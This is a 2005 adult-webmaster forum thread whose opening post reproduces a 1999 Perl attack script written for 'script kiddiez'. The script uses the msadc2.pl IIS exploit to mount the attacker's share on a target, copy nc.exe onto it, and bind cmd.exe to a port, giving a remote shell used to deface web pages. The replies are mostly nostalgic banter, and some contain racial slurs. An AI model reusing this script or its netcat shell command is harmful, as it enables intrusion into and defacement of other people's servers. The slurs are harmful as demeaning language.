Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar Mark Forums Read
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 01-26-2005, 03:59 PM   #1
ytcracker
stc is the greatest
 
ytcracker's Avatar
 
Join Date: Dec 2002
Location: rip sean murray
Posts: 12,403
ahh history

#!/usr/bin/perl
# [msadc2.pl GFX spin perl script]
# by ytcracker/[email protected]
#
# [being description]
# for all the script kiddiez out there who want gfx on their
# hax0red pages in win 9x/NT. msadc oenz you in the 9d9.
# requires msadc2.pl.
# [end description]
#
# [begin usage]
# first off, you need to enable sharing on your win 9x/NT box.
# select a folder and copy your html and graphics into it.
# share the folder with the name "share". mount it read only.
# copy nc.exe into the shared folder.
#
# perl gfxspin.pl [remote host] [local ip] [cmd port]
# i.e. perl gfxspin.pl www.felons.org 132.7.34.223 8500
#
# opens a command shell on port 8500, sharing the drive as y:
# on the remote system. you may need to turn on local echo for
# windows telnet if you haven't already.
#
# IMPORTANT: be sure that at the end of your session you type
# "net use y: /DELETE /YES" to unmount the share from the target box.
# [end usage]


if (!($ARGV[0])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl [remote host] [local ip] [cmd port]\n";
exit;
}

if (!($ARGV[1])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl $ARGV[0] [local ip] [cmd port]\n";
exit;
}

if (!($ARGV[2])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl $ARGV[0] $ARGV[1] [cmd port]\n";
exit;
}

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "net use y: \\\\$ARGV[1]\\share /YES\n";
close TRGET;

sleep 5;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "copy y:\\nc.exe \n";
close TRGET;

sleep 20;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "nc -l -p $ARGV[2] -e cmd.exe\n";
close TRGET;

system("telnet $ARGV[0] $ARGV[2]");

#EOF [ytcracker labs 1999]
__________________
www.ytcracker.com | www.digitalgangster.com
i love you
ytcracker is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 04:56 PM   #2
BlueQuartz
Confirmed User
 
Join Date: May 2004
Location: Australia
Posts: 1,971
BlueQuartz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:01 PM   #3
Nismo
Confirmed User
 
Nismo's Avatar
 
Join Date: May 2002
Location: FLORIDA
Posts: 4,977
msadc2.pl & unicode.pl ... ahhh. :/
__________________
i buy massive xxx dating traffic.
Nismo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:04 PM   #4
brand0n
been very busy
 
Join Date: Nov 2002
Location: the queen city
Posts: 26,983
10 print "i am elite"
20 goto 10
__________________
want to buy this spot for cheap? it is of course for sale. long term deals are always the best bet. brand0n/ at/ a o l dot commies.
brand0n is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:05 PM   #5
flashfire
ICQ 1 6 7 8 5 3 4 9 2
 
Join Date: Feb 2003
Posts: 13,098
glad I dont have to code like that anymore
flashfire is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:08 PM   #6
pxxx
First African GFY Member
 
Join Date: Mar 2004
Location: New Jersey
Posts: 12,114
That look like it is hard to understand.
pxxx is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:19 PM   #7
Hairetsu
Confirmed User
 
Join Date: Jul 2003
Location: South Florida
Posts: 541
:-0 sups nigra
Hairetsu is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:39 PM   #8
Screaming
I can change this!!!!!
 
Join Date: Feb 2004
Posts: 18,972
Felons.org? whats that?
__________________
Screaming is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:41 PM   #9
nofx
Too lazy to set a custom title
 
Join Date: Nov 2002
Location: Virgin Mary's womb
Posts: 16,826
yer such a digital gangster ;]
__________________

Often times I wonder why
There's love and hate, theres live or die.
When sickness comes I must decide:
When feelings go, theres suicide.
nofx is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 05:53 PM   #10
Hairetsu
Confirmed User
 
Join Date: Jul 2003
Location: South Florida
Posts: 541
nofx is the niggra of the hax0r n4710n
Hairetsu is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 07:10 PM   #11
See Cig
Confirmed User
 
Join Date: Jan 2005
Posts: 515
dunno wtf any of that shit means
__________________
See Sig
See Cig is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 07:27 PM   #12
Pornopat
AdultTubeSubmits.com
 
Industry Role:
Join Date: Dec 2003
Location: The Netherlands
Posts: 10,598
Quote:
Originally Posted by brand0n
10 print "i am elite"
20 goto 10
Basic....those were the days on my msx 1....
Pornopat is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 01-26-2005, 08:39 PM   #13
wargames
Kliris
 
wargames's Avatar
 
Join Date: May 2003
Location: ca
Posts: 10,423
Get your point.
__________________
ICQ 212-115-582
Email Steve at Vas Media Group .com
wargames is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks
Thread Tools



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.